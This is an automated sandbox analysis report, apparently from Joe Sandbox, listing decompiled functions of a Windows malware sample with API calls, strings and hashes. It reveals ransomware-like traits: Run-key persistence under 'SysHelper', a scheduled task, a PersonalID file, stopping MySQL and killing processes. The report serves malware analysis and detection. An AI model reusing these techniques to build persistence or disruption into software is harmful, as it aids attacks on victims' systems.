                                                                                                                                                    • Opcode ID: 8263a72b855e29a39bdee4ea7f090d0f5430f991cf24ec88085b72484d7b4329
                                                                                                                                                    • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                                                                                                                                                    • Opcode Fuzzy Hash: 8263a72b855e29a39bdee4ea7f090d0f5430f991cf24ec88085b72484d7b4329
                                                                                                                                                    • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041BAE0 Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 0041BB49
                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                                                                                                                                                    • _malloc.LIBCMT ref: 0041BBE4
                                                                                                                                                    • GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
                                                                                                                                                    • _free.LIBCMT ref: 0041BCD7
                                                                                                                                                      • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                                                                      • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                                                                                                                                                      • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                                                                      • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                                                                      • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                                                                      • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                                                                    • IsWindow.USER32(?), ref: 0041BF69
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 0041BF7B
                                                                                                                                                    • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3873257347-0
                                                                                                                                                    • Opcode ID: 872b512db91234dd009610a63f2564f2aa606f2dd561917cc2f2326c6301647b
                                                                                                                                                    • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                                                                                                                                                    • Opcode Fuzzy Hash: 872b512db91234dd009610a63f2564f2aa606f2dd561917cc2f2326c6301647b
                                                                                                                                                    • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00411BB0
                                                                                                                                                    • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                                                                                                                                                    • CoUninitialize.OLE32 ref: 00411BD0
                                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                                                                                                                                                    • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                                                                                                                                                    • lstrcatW.KERNEL32(?), ref: 00411C44
                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                                                                                                                                                    • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                                                                    • String ID: \shell32.dll
                                                                                                                                                    • API String ID: 679253221-3783449302
                                                                                                                                                    • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                                                                    • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
                                                                                                                                                    • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                                                                    • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004549A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 004549FB
                                                                                                                                                    • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                                                                    • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                                                                    • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                                                                    • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                                                                    • _wcsstr.LIBCMT ref: 00454A8A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                    • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                                                    • API String ID: 2112994598-1672312481
                                                                                                                                                    • Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                                                                                    • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                                                                                                                                                    • Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                                                                                    • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00454AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                                                                                                                                                    • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
                                                                                                                                                    • __vfwprintf_p.LIBCMT ref: 00454B27
                                                                                                                                                      • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                                                                                                                                                    • vswprintf.LIBCMT ref: 00454B5D
                                                                                                                                                    • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                                                                                                                                                    • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                                                                                                                                                    • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                                                                                                                                                    • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                                                                    • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                                                                    • API String ID: 277090408-1348657634
                                                                                                                                                    • Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                                                                                    • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                                                                                                                                                    • Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                                                                                    • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00412360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                                                                                                                                                    • _memset.LIBCMT ref: 004123B6
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004123E7
                                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 004123F4
                                                                                                                                                    • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                                                                                                                                                    • lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
                                                                                                                                                    • lstrcmpW.KERNEL32(?,?), ref: 00412422
                                                                                                                                                    Strings
                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                                                                                                                                                    • SysHelper, xrefs: 004123D6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                                                                    • API String ID: 122392481-4165002228
                                                                                                                                                    • Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                                                                                    • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                                                                                                                                                    • Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                                                                                    • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00418000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                    • API String ID: 4104443479-4289949731
                                                                                                                                                    • Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                                                                                    • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                                                                                                                                                    • Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                                                                                    • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0040DAEB
                                                                                                                                                    • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                                                                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
                                                                                                                                                    • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                                                                                                                                                    • _memset.LIBCMT ref: 0040DC38
                                                                                                                                                    • CoUninitialize.OLE32 ref: 0040DC92
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                                                                    • String ID: --Task$Comment$Time Trigger Task
                                                                                                                                                    • API String ID: 330603062-1376107329
                                                                                                                                                    • Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                                                                                                                                                    • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
                                                                                                                                                    • Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                                                                                                                                                    • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                                                                                                                                                    • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                                                                                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                                                                                                                                                    • Sleep.KERNEL32(?), ref: 00411A75
                                                                                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                                                                    • String ID: MYSQL
                                                                                                                                                    • API String ID: 2359367111-1651825290
                                                                                                                                                    • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                                                                                    • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
                                                                                                                                                    • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                                                                                    • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0044F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0044F27F
                                                                                                                                                      • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0044F294
                                                                                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0044F2AD
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                                                                                                                                                    • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                                                                                                                                                      • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0044F2FB
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0044F310
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                                                                    • String ID: bad function call
                                                                                                                                                    • API String ID: 2464034642-3612616537
                                                                                                                                                    • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                                    • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                                                                                                                                                    • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                                    • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00465480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                                                                                                                                                    • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                    • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                                                                    • API String ID: 1717984340-2085858615
                                                                                                                                                    • Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                                                                                                                                                    • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
                                                                                                                                                    • Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                                                                                                                                                    • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00425B6E Relevance: 15.1, APIs: 10, Instructions: 131COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 790675137-0
                                                                                                                                                    • Opcode ID: 0cea2679c22e69a6651b2cfa444a0cd29bf08a3a53bd5d8ba21c7187460af639
                                                                                                                                                    • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
                                                                                                                                                    • Opcode Fuzzy Hash: 0cea2679c22e69a6651b2cfa444a0cd29bf08a3a53bd5d8ba21c7187460af639
                                                                                                                                                    • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                                                                                                                                                    • _fgetws.LIBCMT ref: 0040C7BC
                                                                                                                                                    • _memmove.LIBCMT ref: 0040C89F
                                                                                                                                                    • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                                                                    • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                    • API String ID: 2864494435-54166481
                                                                                                                                                    • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                                    • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                                                                                                                                                    • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                                    • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00412440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004124B7
                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004124CD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
